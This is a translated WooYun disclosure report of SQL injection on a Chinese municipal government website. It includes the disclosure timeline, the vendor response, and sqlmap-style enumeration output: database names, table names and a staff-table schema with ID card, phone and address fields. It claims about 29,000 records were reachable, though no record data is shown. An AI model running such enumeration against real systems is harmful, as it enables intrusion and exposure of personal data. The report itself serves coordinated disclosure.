Vulnerability summary

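Bug ID: wooyun-2015-0141787

Title: SQL injection in the Guigang municipal government website (personal information of nearly 30,000 government staff exposed)

Vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2015-09-19 21:14

Fixed: 2015-11-05 17:06

Publicly disclosed: 2015-11-05 17:06

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]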


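Vulnerability details

Disclosure status:

2015-09-19: Details sent to the vendor; waiting for the vendor to respond
2015-09-21: cncert National Internet Emergency Center has not yet been able to reach the organization concerned; details disclosed only to the notifying body
2015-10-01: Details disclosed to core white hats and experts in related fields
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to trainee white hats
2015-11-05: Details disclosed to the public

Brief description:

I am a cloud in the sky, cast by chance as a shadow on the waves of your heart.

Detailed description: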

http://**.**.**.**/xzspjs.aspx?dep=ggzf
[16:16:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:16:21] [INFO] fetching database names
available databases [28]:
[*] ABMng
[*] BiaoDan
[*] DataStreamToExchange
[*] DataTransact
[*] DBdzjc
[*] GmcIMis
[*] GMCRepMis_In
[*] GMCRepMis_Out
[*] GscGMng
[*] GscMd_MonitorDataPublishToOuter
[*] GscMdLog
[*] GscMdMis
[*] GscMisReg
[*] GscPreMis
[*] GscXMLDeal
[*] GxGscIndividualData
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sunhotel
[*] tempdb
[*] UnitDataExpress
[*] UnitFileExchangePlatform
[*] xinxicenter
[*] zfxxgk
[*] zxde

Proof of vulnerability:

Database: GscGMng
[44 tables]
+-----------------------------+
| GscGAgency |
| GscGAgencyKind |
| GscGAppAgency |
| GscGAppChargeSet |
| GscGAppConditionSet |
| GscGAppDatumSet |
| GscGAppDocFile |
| GscGAppFlatOrg |
| GscGAppProject |
| GscGAppTypeText |
| GscGAppWarrantySet |
| GscGApprove |
| GscGApproveDatumSet |
| GscGBigTBNowUsing |
| GscGBiz |
| GscGConstAplObj |
| GscGCoorLog |
| GscGCoorLoginCount |
| GscGCoordination |
| GscGDay |
| GscGDept |
| GscGMisMaxNum |
| GscGMngDocFile |
| GscGMngOrgOfParentGsc |
| GscGOrg |
| GscGOrgApp |
| GscGOrgBiz |
| GscGOrgan |
| GscGPopedomGroup |
| GscGUser |
| GscGUserDisk |
| GscGUserPopedom |
| GscGWindow |
| GscGWindowForApproveProject |
| GscGWindowForGscOrgan |
| GscGWordType |
| GscGWorkBook |
| GscRecords |
| GscUAppOrg |
| GscUAppProject |
| ThisGGsc |
| ThisTBTSMP |
| 事项信息 |
| 人员信息 |
+-----------------------------+
Database: GscGMng
Table: GscGUser
[42 columns]
+--------------------------------------+-----------+
| Column | Type |
+--------------------------------------+-----------+
| DateTimeOfJoinWork | datetime |
| GscCodeId | nvarchar |
| GscDeptCodeId | nvarchar |
| GscName | nvarchar |
| GscObjectStatusCodeId | nvarchar |
| GscOrganCodeId | nvarchar |
| GscUserAddress | nvarchar |
| GscUserBirthday | datetime |
| GscUserCodeId | nvarchar |
| GscUserDegreeCodeId | nvarchar |
| GscUserEducationCodeId | nvarchar |
| GscUserEmail | nvarchar |
| GscUserForeignLanguageLevel | nvarchar |
| GscUserHomePlace | nvarchar |
| GscUserIDCardNum | nvarchar |
| GscUserIsSupportCadre | bit |
| GscUserJobTypeCodeId | nvarchar |
| GscUserLinkTelephone | nvarchar |
| GscUserMarriageCodeId | nvarchar |
| GscUserMobileTel | nvarchar |
| GscUserName | nvarchar |
| GscUserNationCodeId | nvarchar |
| GscUserPartyCodeId | nvarchar |
| GscUserPhotoDocFile_GscDocFileTBName | nvarchar |
| GscUserPhotoDocFileGuid | nvarchar |
| GscUserPoliticalDuty | nvarchar |
| GscUserPoliticalRankCodeId | nvarchar |
| GscUserSexCodeId | nvarchar |
| GscUserSortOrderNum | int |
| GscUserTechnicalPostTitle | nvarchar |
| GscUserTypeCodeId | nvarchar |
| GscWindowCodeId | nvarchar |
| GscWorkCardNum | nvarchar |
| LocalTB_TSMP | bigint |
| LocalTB_UpdateDateTime | datetime |
| NoteOfGscUser | nvarchar |
| ReSetIPAndNotCheckKey | bit |
| SupportCadreTypeCodeId | nvarchar |
| TB_TSMP | timestamp |
| TBIdOfGscGUser | int |
| TopTB_TSMP | bigint |
| TopTB_UpdateDateTime | datetime |
+--------------------------------------+-----------+
Just dumped a few fields at random. I won't be home tonight, so please don't come checking the water meter, thanks.
Database: GscGMng
Table: GscGUser
[28997 entries]
+---------------+-------------------+-------------------------+---------------------------------+---------------------------+
| GscName | GscUserName | GscUserMobileTel | GscUserAddress | GscUserIDCardNum |
+---------------+-------------------+-------------------------+---------------------------------+---------------------------+

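Suggested fix:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-09-21 17:04

Vendor reply:

CNVD has confirmed the reported issue. It has been passed on by CNCERT to the Guangxi branch center, which will follow up and coordinate with the organization managing the website to handle it.

Latest status:

None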